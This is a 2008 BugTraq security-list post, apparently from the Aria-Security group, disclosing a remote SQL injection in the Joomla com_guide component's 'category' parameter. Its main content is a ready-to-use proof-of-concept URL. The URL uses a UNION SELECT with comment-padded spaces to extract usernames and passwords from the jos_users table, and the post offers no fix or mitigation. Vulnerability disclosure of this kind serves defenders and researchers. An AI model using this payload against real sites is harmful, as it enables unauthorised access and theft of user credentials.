BugTraq
Joomla components com_guide "category" Remote SQL Injection [Aria-Security] Mar 15 2008 11:56PM
no-reply Aria-security net


Aria-Security Team (Persian Security Network)

http://forum.aria-security.com

--------------------------------

Join our english forum @ http://forum.aria-security.com

Shoutz: Aura, Null, Kinglet, t3rr0r1st

Joomla components com_guide "category" Remote SQL Injection

Poc:

index.php?option=com_guide&category=-999999/**/union/**/select/**/0,user
name,password,3,4,5,6,7,8/**/from/**/jos_users/*

Regards,

The-0utl4w

Edit/Delete Message

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus